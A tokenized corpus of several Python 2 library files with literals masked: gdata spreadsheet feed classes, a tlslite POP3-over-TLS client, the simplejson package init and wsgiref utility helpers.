<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> try : <EOL> from xml . etree import cElementTree as ElementTree <EOL> except ImportError : <EOL> try : <EOL> import cElementTree as ElementTree <EOL> except ImportError : <EOL> try : <EOL> from xml . etree import ElementTree <EOL> except ImportError : <EOL> from elementtree import ElementTree <EOL> import atom <EOL> import gdata <EOL> import re <EOL> import string <EOL> GSPREADSHEETS_NAMESPACE = '<STR_LIT>' <EOL> GSPREADSHEETS_TEMPLATE = '<STR_LIT>' <EOL> GSPREADSHEETS_EXTENDED_NAMESPACE = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> GSPREADSHEETS_EXTENDED_TEMPLATE = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class ColCount ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = GSPREADSHEETS_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> def __init__ ( self , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def ColCountFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( ColCount , xml_string ) <EOL> class RowCount ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = GSPREADSHEETS_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> def __init__ ( self , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def RowCountFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( RowCount , xml_string ) <EOL> class Cell ( atom . 
AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = GSPREADSHEETS_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _attributes [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def __init__ ( self , text = None , row = None , col = None , inputValue = None , <EOL> numericValue = None , extension_elements = None , extension_attributes = None ) : <EOL> self . text = text <EOL> self . row = row <EOL> self . col = col <EOL> self . inputValue = inputValue <EOL> self . numericValue = numericValue <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def CellFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( Cell , xml_string ) <EOL> class Custom ( atom . AtomBase ) : <EOL> """<STR_LIT>""" <EOL> _namespace = GSPREADSHEETS_EXTENDED_NAMESPACE <EOL> _children = atom . AtomBase . _children . copy ( ) <EOL> _attributes = atom . AtomBase . _attributes . copy ( ) <EOL> def __init__ ( self , column = None , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . column = column <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def _BecomeChildElement ( self , tree ) : <EOL> new_child = ElementTree . Element ( '<STR_LIT>' ) <EOL> tree . append ( new_child ) <EOL> new_child . tag = '<STR_LIT>' % ( self . __class__ . _namespace , <EOL> self . column ) <EOL> self . _AddMembersToElementTree ( new_child ) <EOL> def _ToElementTree ( self ) : <EOL> new_tree = ElementTree . Element ( '<STR_LIT>' % ( self . __class__ . _namespace , <EOL> self . column ) ) <EOL> self . 
_AddMembersToElementTree ( new_tree ) <EOL> return new_tree <EOL> def _HarvestElementTree ( self , tree ) : <EOL> namespace_uri , local_tag = string . split ( tree . tag [ <NUM_LIT:1> : ] , "<STR_LIT:}>" , <NUM_LIT:1> ) <EOL> self . column = local_tag <EOL> for child in tree : <EOL> self . _ConvertElementTreeToMember ( child ) <EOL> for attribute , value in tree . attrib . iteritems ( ) : <EOL> self . _ConvertElementAttributeToMember ( attribute , value ) <EOL> self . text = tree . text <EOL> def CustomFromString ( xml_string ) : <EOL> element_tree = ElementTree . fromstring ( xml_string ) <EOL> return _CustomFromElementTree ( element_tree ) <EOL> def _CustomFromElementTree ( element_tree ) : <EOL> namespace_uri , local_tag = string . split ( element_tree . tag [ <NUM_LIT:1> : ] , "<STR_LIT:}>" , <NUM_LIT:1> ) <EOL> if namespace_uri == GSPREADSHEETS_EXTENDED_NAMESPACE : <EOL> new_custom = Custom ( ) <EOL> new_custom . _HarvestElementTree ( element_tree ) <EOL> new_custom . column = local_tag <EOL> return new_custom <EOL> return None <EOL> class SpreadsheetsSpreadsheet ( gdata . GDataEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataEntry . _children . copy ( ) <EOL> _attributes = gdata . GDataEntry . _attributes . copy ( ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> text = None , extension_elements = None , extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . 
summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . updated = updated <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def SpreadsheetsSpreadsheetFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsSpreadsheet , <EOL> xml_string ) <EOL> class SpreadsheetsWorksheet ( gdata . GDataEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataEntry . _children . copy ( ) <EOL> _attributes = gdata . GDataEntry . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> RowCount ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> ColCount ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> row_count = None , col_count = None , text = None , extension_elements = None , <EOL> extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . updated = updated <EOL> self . row_count = row_count <EOL> self . col_count = col_count <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def SpreadsheetsWorksheetFromString ( xml_string ) : <EOL> return atom . 
CreateClassFromXMLString ( SpreadsheetsWorksheet , <EOL> xml_string ) <EOL> class SpreadsheetsCell ( gdata . BatchEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . BatchEntry . _children . copy ( ) <EOL> _attributes = gdata . BatchEntry . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , Cell ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> cell = None , batch_operation = None , batch_id = None , batch_status = None , <EOL> text = None , extension_elements = None , extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . batch_operation = batch_operation <EOL> self . batch_id = batch_id <EOL> self . batch_status = batch_status <EOL> self . updated = updated <EOL> self . cell = cell <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def SpreadsheetsCellFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsCell , <EOL> xml_string ) <EOL> class SpreadsheetsList ( gdata . GDataEntry ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataEntry . _children . copy ( ) <EOL> _attributes = gdata . GDataEntry . _attributes . 
copy ( ) <EOL> def __init__ ( self , author = None , category = None , content = None , <EOL> contributor = None , atom_id = None , link = None , published = None , rights = None , <EOL> source = None , summary = None , title = None , control = None , updated = None , <EOL> custom = None , <EOL> text = None , extension_elements = None , extension_attributes = None ) : <EOL> self . author = author or [ ] <EOL> self . category = category or [ ] <EOL> self . content = content <EOL> self . contributor = contributor or [ ] <EOL> self . id = atom_id <EOL> self . link = link or [ ] <EOL> self . published = published <EOL> self . rights = rights <EOL> self . source = source <EOL> self . summary = summary <EOL> self . control = control <EOL> self . title = title <EOL> self . updated = updated <EOL> self . custom = custom or { } <EOL> self . text = text <EOL> self . extension_elements = extension_elements or [ ] <EOL> self . extension_attributes = extension_attributes or { } <EOL> def _ConvertElementTreeToMember ( self , child_tree ) : <EOL> if self . __class__ . _children . has_key ( child_tree . tag ) : <EOL> member_name = self . __class__ . _children [ child_tree . tag ] [ <NUM_LIT:0> ] <EOL> member_class = self . __class__ . _children [ child_tree . tag ] [ <NUM_LIT:1> ] <EOL> if isinstance ( member_class , list ) : <EOL> if getattr ( self , member_name ) is None : <EOL> setattr ( self , member_name , [ ] ) <EOL> getattr ( self , member_name ) . append ( atom . _CreateClassFromElementTree ( <EOL> member_class [ <NUM_LIT:0> ] , child_tree ) ) <EOL> else : <EOL> setattr ( self , member_name , <EOL> atom . _CreateClassFromElementTree ( member_class , child_tree ) ) <EOL> elif child_tree . tag . find ( '<STR_LIT>' % GSPREADSHEETS_EXTENDED_NAMESPACE ) == <NUM_LIT:0> : <EOL> name = child_tree . tag [ child_tree . tag . index ( '<STR_LIT:}>' ) + <NUM_LIT:1> : ] <EOL> custom = _CustomFromElementTree ( child_tree ) <EOL> if custom : <EOL> self . 
custom [ name ] = custom <EOL> else : <EOL> ExtensionContainer . _ConvertElementTreeToMember ( self , child_tree ) <EOL> def _AddMembersToElementTree ( self , tree ) : <EOL> member_node_names = [ values [ <NUM_LIT:0> ] for tag , values in <EOL> self . __class__ . _children . iteritems ( ) ] <EOL> for member_name in member_node_names : <EOL> member = getattr ( self , member_name ) <EOL> if member is None : <EOL> pass <EOL> elif isinstance ( member , list ) : <EOL> for instance in member : <EOL> instance . _BecomeChildElement ( tree ) <EOL> else : <EOL> member . _BecomeChildElement ( tree ) <EOL> for xml_attribute , member_name in self . __class__ . _attributes . iteritems ( ) : <EOL> member = getattr ( self , member_name ) <EOL> if member is not None : <EOL> tree . attrib [ xml_attribute ] = member <EOL> for name , custom in self . custom . iteritems ( ) : <EOL> custom . _BecomeChildElement ( tree ) <EOL> atom . ExtensionContainer . _AddMembersToElementTree ( self , tree ) <EOL> def SpreadsheetsListFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsList , <EOL> xml_string ) <EOL> element_tree = ElementTree . fromstring ( xml_string ) <EOL> return _SpreadsheetsListFromElementTree ( element_tree ) <EOL> class SpreadsheetsSpreadsheetsFeed ( gdata . GDataFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataFeed . _children . copy ( ) <EOL> _attributes = gdata . GDataFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsSpreadsheet ] ) <EOL> def SpreadsheetsSpreadsheetsFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsSpreadsheetsFeed , <EOL> xml_string ) <EOL> class SpreadsheetsWorksheetsFeed ( gdata . GDataFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataFeed . _children . 
copy ( ) <EOL> _attributes = gdata . GDataFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsWorksheet ] ) <EOL> def SpreadsheetsWorksheetsFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsWorksheetsFeed , <EOL> xml_string ) <EOL> class SpreadsheetsCellsFeed ( gdata . BatchFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . BatchFeed . _children . copy ( ) <EOL> _attributes = gdata . BatchFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsCell ] ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> RowCount ) <EOL> _children [ '<STR_LIT>' % GSPREADSHEETS_NAMESPACE ] = ( '<STR_LIT>' , <EOL> ColCount ) <EOL> def __init__ ( self , author = None , category = None , contributor = None , <EOL> generator = None , icon = None , atom_id = None , link = None , logo = None , <EOL> rights = None , subtitle = None , title = None , updated = None , <EOL> entry = None , total_results = None , start_index = None , <EOL> items_per_page = None , extension_elements = None , <EOL> extension_attributes = None , text = None , row_count = None , <EOL> col_count = None , interrupted = None ) : <EOL> gdata . BatchFeed . __init__ ( self , author = author , category = category , <EOL> contributor = contributor , generator = generator , <EOL> icon = icon , atom_id = atom_id , link = link , <EOL> logo = logo , rights = rights , subtitle = subtitle , <EOL> title = title , updated = updated , entry = entry , <EOL> total_results = total_results , <EOL> start_index = start_index , <EOL> items_per_page = items_per_page , <EOL> extension_elements = extension_elements , <EOL> extension_attributes = extension_attributes , <EOL> text = text , interrupted = interrupted ) <EOL> self . row_count = row_count <EOL> self . 
col_count = col_count <EOL> def GetBatchLink ( self ) : <EOL> for link in self . link : <EOL> if link . rel == '<STR_LIT>' : <EOL> return link <EOL> return None <EOL> def SpreadsheetsCellsFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsCellsFeed , <EOL> xml_string ) <EOL> class SpreadsheetsListFeed ( gdata . GDataFeed ) : <EOL> """<STR_LIT>""" <EOL> _tag = '<STR_LIT>' <EOL> _namespace = atom . ATOM_NAMESPACE <EOL> _children = gdata . GDataFeed . _children . copy ( ) <EOL> _attributes = gdata . GDataFeed . _attributes . copy ( ) <EOL> _children [ '<STR_LIT>' % atom . ATOM_NAMESPACE ] = ( '<STR_LIT>' , <EOL> [ SpreadsheetsList ] ) <EOL> def SpreadsheetsListFeedFromString ( xml_string ) : <EOL> return atom . CreateClassFromXMLString ( SpreadsheetsListFeed , <EOL> xml_string ) </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> from poplib import POP3 <EOL> from gdata . tlslite . TLSConnection import TLSConnection <EOL> from gdata . tlslite . integration . ClientHelper import ClientHelper <EOL> POP3_TLS_PORT = <NUM_LIT> <EOL> class POP3_TLS ( POP3 , ClientHelper ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port = POP3_TLS_PORT , <EOL> username = None , password = None , sharedKey = None , <EOL> certChain = None , privateKey = None , <EOL> cryptoID = None , protocol = None , <EOL> x509Fingerprint = None , <EOL> x509TrustList = None , x509CommonName = None , <EOL> settings = None ) : <EOL> """<STR_LIT>""" <EOL> self . host = host <EOL> self . port = port <EOL> msg = "<STR_LIT>" <EOL> self . sock = None <EOL> for res in socket . getaddrinfo ( self . host , self . port , <NUM_LIT:0> , socket . SOCK_STREAM ) : <EOL> af , socktype , proto , canonname , sa = res <EOL> try : <EOL> self . sock = socket . socket ( af , socktype , proto ) <EOL> self . sock . connect ( sa ) <EOL> except socket . error , msg : <EOL> if self . sock : <EOL> self . sock . close ( ) <EOL> self . sock = None <EOL> continue <EOL> break <EOL> if not self . sock : <EOL> raise socket . error , msg <EOL> ClientHelper . __init__ ( self , <EOL> username , password , sharedKey , <EOL> certChain , privateKey , <EOL> cryptoID , protocol , <EOL> x509Fingerprint , <EOL> x509TrustList , x509CommonName , <EOL> settings ) <EOL> self . sock = TLSConnection ( self . sock ) <EOL> self . sock . closeSocket = True <EOL> ClientHelper . _handshake ( self , self . sock ) <EOL> self . file = self . sock . makefile ( '<STR_LIT:rb>' ) <EOL> self . _debugging = <NUM_LIT:0> <EOL> self . welcome = self . _getresp ( ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] </s>
<s> r"""<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> __author__ = '<STR_LIT>' <EOL> from decoder import JSONDecoder , JSONDecodeError <EOL> from encoder import JSONEncoder <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordered_dict import OrderedDict <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> ) <EOL> def dump ( obj , fp , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not kw ) : <EOL> iterable = _default_encoder . iterencode ( obj ) <EOL> else : <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> iterable = cls ( skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , <EOL> default = default , ** kw ) . iterencode ( obj ) <EOL> for chunk in iterable : <EOL> fp . 
write ( chunk ) <EOL> def dumps ( obj , skipkeys = False , ensure_ascii = True , check_circular = True , <EOL> allow_nan = True , cls = None , indent = None , separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , default = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( not skipkeys and ensure_ascii and <EOL> check_circular and allow_nan and <EOL> cls is None and indent is None and separators is None and <EOL> encoding == '<STR_LIT:utf-8>' and default is None and not kw ) : <EOL> return _default_encoder . encode ( obj ) <EOL> if cls is None : <EOL> cls = JSONEncoder <EOL> return cls ( <EOL> skipkeys = skipkeys , ensure_ascii = ensure_ascii , <EOL> check_circular = check_circular , allow_nan = allow_nan , indent = indent , <EOL> separators = separators , encoding = encoding , default = default , <EOL> ** kw ) . encode ( obj ) <EOL> _default_decoder = JSONDecoder ( encoding = None , object_hook = None , <EOL> object_pairs_hook = None ) <EOL> def load ( fp , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> return loads ( fp . read ( ) , <EOL> encoding = encoding , cls = cls , object_hook = object_hook , <EOL> parse_float = parse_float , parse_int = parse_int , <EOL> parse_constant = parse_constant , object_pairs_hook = object_pairs_hook , <EOL> ** kw ) <EOL> def loads ( s , encoding = None , cls = None , object_hook = None , parse_float = None , <EOL> parse_int = None , parse_constant = None , object_pairs_hook = None , ** kw ) : <EOL> """<STR_LIT>""" <EOL> if ( cls is None and encoding is None and object_hook is None and <EOL> parse_int is None and parse_float is None and <EOL> parse_constant is None and object_pairs_hook is None and not kw ) : <EOL> return _default_decoder . 
decode ( s ) <EOL> if cls is None : <EOL> cls = JSONDecoder <EOL> if object_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_hook <EOL> if object_pairs_hook is not None : <EOL> kw [ '<STR_LIT>' ] = object_pairs_hook <EOL> if parse_float is not None : <EOL> kw [ '<STR_LIT>' ] = parse_float <EOL> if parse_int is not None : <EOL> kw [ '<STR_LIT>' ] = parse_int <EOL> if parse_constant is not None : <EOL> kw [ '<STR_LIT>' ] = parse_constant <EOL> return cls ( encoding = encoding , ** kw ) . decode ( s ) <EOL> def _toggle_speedups ( enabled ) : <EOL> import simplejson . decoder as dec <EOL> import simplejson . encoder as enc <EOL> import simplejson . scanner as scan <EOL> try : <EOL> from simplejson . _speedups import make_encoder as c_make_encoder <EOL> except ImportError : <EOL> c_make_encoder = None <EOL> if enabled : <EOL> dec . scanstring = dec . c_scanstring or dec . py_scanstring <EOL> enc . c_make_encoder = c_make_encoder <EOL> enc . encode_basestring_ascii = ( enc . c_encode_basestring_ascii or <EOL> enc . py_encode_basestring_ascii ) <EOL> scan . make_scanner = scan . c_make_scanner or scan . py_make_scanner <EOL> else : <EOL> dec . scanstring = dec . py_scanstring <EOL> enc . c_make_encoder = None <EOL> enc . encode_basestring_ascii = enc . py_encode_basestring_ascii <EOL> scan . make_scanner = scan . py_make_scanner <EOL> dec . make_scanner = scan . make_scanner <EOL> global _default_decoder <EOL> _default_decoder = JSONDecoder ( <EOL> encoding = None , <EOL> object_hook = None , <EOL> object_pairs_hook = None , <EOL> ) <EOL> global _default_encoder <EOL> _default_encoder = JSONEncoder ( <EOL> skipkeys = False , <EOL> ensure_ascii = True , <EOL> check_circular = True , <EOL> allow_nan = True , <EOL> indent = None , <EOL> separators = None , <EOL> encoding = '<STR_LIT:utf-8>' , <EOL> default = None , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import posixpath <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> class FileWrapper : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filelike , blksize = <NUM_LIT> ) : <EOL> self . filelike = filelike <EOL> self . blksize = blksize <EOL> if hasattr ( filelike , '<STR_LIT>' ) : <EOL> self . close = filelike . close <EOL> def __getitem__ ( self , key ) : <EOL> data = self . filelike . read ( self . blksize ) <EOL> if data : <EOL> return data <EOL> raise IndexError <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> data = self . filelike . read ( self . blksize ) <EOL> if data : <EOL> return data <EOL> raise StopIteration <EOL> def guess_scheme ( environ ) : <EOL> """<STR_LIT>""" <EOL> if environ . get ( "<STR_LIT>" ) in ( '<STR_LIT:yes>' , '<STR_LIT>' , '<STR_LIT:1>' ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT:http>' <EOL> def application_uri ( environ ) : <EOL> """<STR_LIT>""" <EOL> url = environ [ '<STR_LIT>' ] + '<STR_LIT>' <EOL> from urllib import quote <EOL> if environ . get ( '<STR_LIT>' ) : <EOL> url += environ [ '<STR_LIT>' ] <EOL> else : <EOL> url += environ [ '<STR_LIT>' ] <EOL> if environ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if environ [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> url += '<STR_LIT::>' + environ [ '<STR_LIT>' ] <EOL> else : <EOL> if environ [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> url += '<STR_LIT::>' + environ [ '<STR_LIT>' ] <EOL> url += quote ( environ . get ( '<STR_LIT>' ) or '<STR_LIT:/>' ) <EOL> return url <EOL> def request_uri ( environ , include_query = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> url = application_uri ( environ ) <EOL> from urllib import quote <EOL> path_info = quote ( environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if not environ . 
get ( '<STR_LIT>' ) : <EOL> url += path_info [ <NUM_LIT:1> : ] <EOL> else : <EOL> url += path_info <EOL> if include_query and environ . get ( '<STR_LIT>' ) : <EOL> url += '<STR_LIT:?>' + environ [ '<STR_LIT>' ] <EOL> return url <EOL> def shift_path_info ( environ ) : <EOL> """<STR_LIT>""" <EOL> path_info = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not path_info : <EOL> return None <EOL> path_parts = path_info . split ( '<STR_LIT:/>' ) <EOL> path_parts [ <NUM_LIT:1> : - <NUM_LIT:1> ] = [ p for p in path_parts [ <NUM_LIT:1> : - <NUM_LIT:1> ] if p and p < > '<STR_LIT:.>' ] <EOL> name = path_parts [ <NUM_LIT:1> ] <EOL> del path_parts [ <NUM_LIT:1> ] <EOL> script_name = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> script_name = posixpath . normpath ( script_name + '<STR_LIT:/>' + name ) <EOL> if script_name . endswith ( '<STR_LIT:/>' ) : <EOL> script_name = script_name [ : - <NUM_LIT:1> ] <EOL> if not name and not script_name . endswith ( '<STR_LIT:/>' ) : <EOL> script_name += '<STR_LIT:/>' <EOL> environ [ '<STR_LIT>' ] = script_name <EOL> environ [ '<STR_LIT>' ] = '<STR_LIT:/>' . join ( path_parts ) <EOL> if name == '<STR_LIT:.>' : <EOL> name = None <EOL> return name <EOL> def setup_testing_defaults ( environ ) : <EOL> """<STR_LIT>""" <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ . setdefault ( '<STR_LIT>' , environ [ '<STR_LIT>' ] ) <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT:GET>' ) <EOL> if '<STR_LIT>' not in environ and '<STR_LIT>' not in environ : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> environ . setdefault ( '<STR_LIT>' , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> environ . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> environ . setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> environ . 
setdefault ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> from StringIO import StringIO <EOL> environ . setdefault ( '<STR_LIT>' , StringIO ( "<STR_LIT>" ) ) <EOL> environ . setdefault ( '<STR_LIT>' , StringIO ( ) ) <EOL> environ . setdefault ( '<STR_LIT>' , guess_scheme ( environ ) ) <EOL> if environ [ '<STR_LIT>' ] == '<STR_LIT:http>' : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif environ [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _hoppish = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } . has_key <EOL> def is_hop_by_hop ( header_name ) : <EOL> """<STR_LIT>""" <EOL> return _hoppish ( header_name . lower ( ) ) </s>
